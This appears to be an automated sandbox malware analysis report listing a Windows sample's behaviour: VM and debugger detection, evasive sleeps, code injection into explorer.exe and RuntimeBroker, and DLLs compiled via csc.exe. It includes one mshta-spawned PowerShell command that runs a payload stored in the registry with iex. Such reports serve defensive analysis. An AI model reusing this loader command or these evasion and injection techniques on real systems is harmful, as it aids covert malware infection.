Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2918			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6023			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll32.exe TID: 5768	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4540	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3984	Thread sleep time: -3005658240s >= -30000s

Source: C:\Windows\System32\loaddll32.exe

0_2_026742B4

Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000021.00000002.909095475.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.845693357.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000001E.00000000.838462284.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: WerFault.exe, 00000025.00000003.879906098.0000000004AD2000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWk
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RuntimeBroker.exe, 00000021.00000002.912423816.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000003.905601233.000000000DC82000.00000004.00000040.sdmp	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 0000001E.00000000.845951984.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 0000001E.00000003.905640815.000000000DC69000.00000004.00000040.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 0000001E.00000000.840037908.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.913809482.0000027D4F440000.00000002.00000001.sdmp, WerFault.exe, 00000025.00000002.883131982.0000000004B50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.913091879.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_011115D2 GetLastError,NtClose,LdrInitializeThunk,

0_2_011115D2

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 1050000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 284AA390000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: BD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: BD4F1580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 9EC000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 4980000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3424 base: 7FFABD4F1580 value: 40	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 6752	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3424	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3656
Source: C:\Windows\explorer.exe	Thread register set: target process: 4268
Source: C:\Windows\explorer.exe	Thread register set: target process: 4772
Source: C:\Windows\explorer.exe	Thread register set: target process: 5772
Source: C:\Windows\explorer.exe	Thread register set: target process: 6228
Source: C:\Windows\explorer.exe	Thread register set: target process: 6020
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5528

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 1050000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF672E412E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 9EC000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 4980000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4FAC50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 284AA390000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF6A9395FD0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Source: explorer.exe, 0000001E.00000000.830065181.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.910386798.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.910671996.0000027D4CC60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001E.00000000.845870000.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02675F3A cpuid

0_2_02675F3A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0111179C GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_0111179C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02675F3A RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_02675F3A

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_01111CE1 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_01111CE1

